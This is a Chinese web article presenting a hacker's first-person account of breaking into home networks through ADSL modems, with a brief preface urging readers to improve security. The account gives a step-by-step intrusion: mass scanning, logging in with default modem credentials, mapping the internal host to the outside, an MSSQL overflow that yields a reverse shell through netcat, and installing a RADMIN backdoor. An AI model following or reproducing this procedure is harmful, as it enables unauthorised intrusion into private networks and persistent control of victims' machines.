這是一位所謂的＂黑客＂的口述，你不妨看一下，也許你看完后對(duì)他的技術(shù)性做法不是完全明白，但是你肯定會(huì)感到一身冷汗，因?yàn)槲覀儸F(xiàn)在使用ADSL已經(jīng)日益廣泛，但我們的安全意識(shí)還不是很強(qiáng)．聽(tīng)完他的口述希望大家在日后能加強(qiáng)安全防范！
口述：
也許看爛了網(wǎng)上已有的常規(guī)黑客攻擊手段，對(duì)一些陳舊的入侵手法早已厭煩，近來(lái)我對(duì)ADSL MODEM的路由功能產(chǎn)生了濃厚的興趣，經(jīng)過(guò)一番努力，我終于找到了穿透ADSL路由入侵內(nèi)網(wǎng)的方法，在這里和各位一起分享我的心得。
一．掃描
現(xiàn)在很多ADSL MODEM都是通過(guò) 80 23 21 三個(gè)端口來(lái)管理，但80 21端口有很多服務(wù)器都有打開(kāi)，沒(méi)怎么特征性，于是我選擇了23端口，打開(kāi)我的至愛(ài)：SUPPERSCAN，填上我所在地區(qū)的IP段，（跨多幾段都沒(méi)關(guān)系，反正SUPPERSCAN的速度就是快）眨眼間，結(jié)果出來(lái)了，開(kāi)23的主機(jī)還真不小?。海┪姨袅藥着_(tái)出來(lái)，在瀏覽器那里輸入IP：218.xxx.xxx.xxx，OK。登陸對(duì)話框出來(lái)了，輸入U(xiǎn)SER：ADSL pass:adsl1234（因?yàn)槲疫@里的adsl modem一般是華碩的，缺省是adsl adsl1234）bingle 一矢中的，現(xiàn)在我就是上帝。
二．映射
入侵已經(jīng)成功了一半，要進(jìn)一步入侵內(nèi)網(wǎng)，我們要進(jìn)行端口映射，但是我連內(nèi)網(wǎng)的拓?fù)?，都不知道（更不用說(shuō)內(nèi)網(wǎng)主機(jī)的端口開(kāi)放情況了）又怎么映射呢？在此，我選擇了猜測(cè)。一般來(lái)說(shuō)，MODEM的內(nèi)網(wǎng)IP缺省是192．168．1．1，而大多數(shù)就把自己主機(jī)的IP設(shè)成192.168.1.2。因此我們只要試試把192．168．1．2的端口映射出來(lái)就行了（但如果使用了dhcp就麻煩了）。但是192．168．1．2到底開(kāi)放了什么端口，我們根本就不知道啊，呵呵，既然不知道，那么我就把他整臺(tái)主機(jī)透明地映射到外網(wǎng)，具體做法如下：進(jìn)入NAT選項(xiàng)---添加NAT規(guī)則---BAMID---填入主機(jī)IP：192．168．1．2，到此192．168．1．2已經(jīng)透明地映射到192．168．1．1上了，我們?cè)L問(wèn)ADSL MODEM就等于訪問(wèn)主機(jī)192．168．1．2了
三．檢測(cè)
現(xiàn)在我們?cè)僬?qǐng)出SUPPERSCAN對(duì)218．xxx．xxx．xxx進(jìn)行掃描，呵，看到?jīng)]有？掃描結(jié)果已經(jīng)不同了，開(kāi)放的端口是139 1433等，剛才只是開(kāi)放了80 23 21 而已（也就是說(shuō)我們的映射已經(jīng)成功了）該是X-SCAN出手了，用它來(lái)掃弱口令最好不過(guò)了，但掃描的結(jié)果令人失望，一個(gè)弱口令也沒(méi)有，看來(lái)管理員還不算低B啊。
四．溢出
既然沒(méi)有弱口令，也沒(méi)開(kāi)80，那只好從溢出方面著手了，但沒(méi)開(kāi)80 21 也就webdav .sevr-u的溢出沒(méi)戲了，很自然，我向?qū)Я薘PC溢出，但實(shí)踐證明RPC溢出也是不行的，LSASS溢出也不行 。
五．募然回首，那人卻在，燈火闌珊處
　　看來(lái)這管理員還是比較負(fù)責(zé)的，該打的補(bǔ)丁都打上了，這時(shí)侯，我的目光轉(zhuǎn)移到1433上了（嘿，不知道他打了SQL補(bǔ)丁沒(méi)有？）心動(dòng)不如行動(dòng)，現(xiàn)在只好死馬當(dāng)活馬醫(yī)了，于是
　　nc -v -l 99
　　sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
bingle 成功地得到一個(gè)shell了。
六．設(shè)置后門(mén)
到這里，我們的入侵已經(jīng)成功了，余下的是掃尾留后門(mén)，至于后門(mén)，我一般都是用FTP上傳RADMIN上去的，呵呵，這里不詳談了，相信各位都知道。

版權(quán)聲明：本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái)，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。